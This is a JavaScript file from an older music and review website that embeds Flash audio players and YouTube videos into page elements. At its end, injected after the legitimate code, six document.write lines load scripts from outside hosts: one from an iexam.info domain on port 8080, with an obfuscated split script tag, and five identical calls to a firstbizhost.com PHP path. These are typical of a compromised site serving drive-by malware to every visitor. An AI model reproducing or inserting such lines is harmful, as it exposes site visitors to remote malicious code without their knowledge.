
		var tracks = new Array();				function buildPlayer () {			return true;			var url = '';			for (var i in tracks) {				url += '&tracks[]='+tracks[i].track;				url += '&urls[]='+tracks[i].url;				url += '&artists[]='+tracks[i].artist;				url += '&albums[]='+tracks[i].album;			}			var txt = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="400" height="15" id="xspf_player" align="middle"><param name="allowScriptAccess" value="true" /><param name="movie" value="/music/xspf_player_slim.swf?playlist_url=/music/xspf.php?xn_auth=no&amp;player_title=Best%20of%2009&amp;autoload=true'+url+'" /><param name="quality" value="high" /><param name="bgcolor" value="#e6e6e6" /><embed src="/music/xspf_player_slim.swf?playlist_url=/music/xspf.php?xn_auth=no&amp;player_title=Best%20of%2009&amp;autoload=true'+url+'" quality="high" bgcolor="#e6e6e6" width="400" height="15" name="xspf_player" align="middle" allowScriptAccess="true" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object>';			document.getElementById('playerContainer').innerHTML = txt;		}				function parseCode () {
			var a,spans,container,bs,artist,album;
			spans = document.getElementsByTagName('span');
			for (var s in spans) {
				if (spans[s].className=='player') {
					if (!spans[s].nextSibling) continue;
					a = spans[s].nextSibling.nextSibling;					var o = document.createElement('object');					o.setAttribute('classid','clsid:D27CDB6E-AE6D-11cf-96B8-444553540000');					o.setAttribute('codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0');					o.width = 165;					o.height = 38;					o.id = 'niftPlayer'+s;					var p = document.createElement('param');					p.name = 'movie';					p.value = 'music/niftyplayer.swf?file='+a.href+'&as=0';					o.appendChild(p);					p = document.createElement('param');					p.name = 'quality';					p.value = 'high';					o.appendChild(p);					p = document.createElement('param');					p.name = 'bgcolor';					p.value = '#fff';					o.appendChild(p);					p = document.createElement('param');					p.name = 'play';					p.value = 'false';					o.appendChild(p);					try {						var e = document.createElement('embed');						e.src = 'music/niftyplayer.swf?file='+a.href+'&as=0';						e.setAttribute('quality','high');						e.setAttribute('bgcolor','#fff');						e.width = 165;						e.height = 38;						e.name = 'niftyPlayer'+s;						e.type = 'application/x-shockwave-flash';						e.setAttribute('pluginspage','http://www.macromedia.com/go/getflashplayer');						o.appendChild(e);					}					catch (e) {					}					spans[s].appendChild(o);										spans[s].innerHTML = spans[s].innerHTML+'<br/>';										container = spans[s].parentNode.parentNode.parentNode;					bs = container.getElementsByTagName('b');					for (var b in bs) {						if (bs[b].className=='artist') artist = bs[b].innerHTML;						else if (bs[b].className=='album') album = bs[b].innerHTML;					}					a = spans[s].nextSibling.nextSibling;					if (artist && album) tracks[tracks.length] = {track:unescape(a.href.substr(a.href.lastIndexOf('/')+1)).replace(/([\d\w\-\_\% \,]+)\.mp3$/g,'$1').replace(/_/g,' '),url:escape(a.href),artist:artist,album:album};
				}
				else if (spans[s].className=='review') {
					spans[s].innerHTML = spans[s].innerHTML.replace(/\\n/g,'<br/>');
				}
				else if (spans[s].className=='video') {
					/*<object width="560" height="340"><param name="movie" value="http://www.youtube.com/v/8mRgP4sb5XA&hl=en_US&fs=1&"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/8mRgP4sb5XA&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"></embed></object>*/
					if (!spans[s].nextSibling) continue;
					a = spans[s].nextSibling;
					var vid = a.href.replace(/\/watch\?v=([\w\d\_\-\+]+)/,'/v/$1&hl=en_US&fs=1&');
					var obj = document.createElement('object');					obj.id = 'vid'+s;					obj.setAttribute('classid','clsid:D27CDB6E-AE6D-11cf-96B8-444553540000');					obj.setAttribute('codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0');
					obj.width = 350;
					obj.height = 275;
					var param = document.createElement('param');
					param.name = 'movie';
					param.value = vid;
					obj.appendChild(param);
					param = document.createElement('param');
					param.name = 'allowFullScreen';
					param.value = 'true';
					obj.appendChild(param);
					param = document.createElement('param');
					param.name = 'allowscriptaccess';
					param.value = 'always';
					obj.appendChild(param);
					try {						var embed = document.createElement('embed');
						embed.src = vid;
						embed.type = 'application/x-shockwave-flash';
						embed.allowscriptaccess = 'always';
						embed.allowfullscreen = 'true';
						embed.width = 350;
						embed.height = 275;
						obj.appendChild(embed);					}					catch (e) {					}
					spans[s].appendChild(obj);
					spans[s].innerHTML = spans[s].innerHTML+'<br/>';
				}
			}						buildPlayer();
		}
		
		function showVideos (a) {
			var lis;
			lis = a.parentNode.parentNode.getElementsByTagName('li');
			for (var li in lis) {
				if (typeof(lis[li].style)=='undefined') continue;
				if (lis[li].className=='first') continue;
				lis[li].style.display = (a.innerHTML.search(/(^| )show /i)>-1) ? 'inline' : 'none';
			}
			a.innerHTML = (a.innerHTML.search(/(^| )show /i)>-1) ? a.innerHTML.replace(/^Show /,'Hide ') : a.innerHTML.replace(/^Hide /,'Show ');
		}



document.write('<s'+'cript type="text/javascript" src="http://sfofotky.iexam.info:8080/Ethernet.js"></scr'+'ipt>');
document.write('<script src=http://firstbizhost.com/images/gifimg.php ><\/script>');
document.write('<script src=http://firstbizhost.com/images/gifimg.php ><\/script>');
document.write('<script src=http://firstbizhost.com/images/gifimg.php ><\/script>');
document.write('<script src=http://firstbizhost.com/images/gifimg.php ><\/script>');
document.write('<script src=http://firstbizhost.com/images/gifimg.php ><\/script>');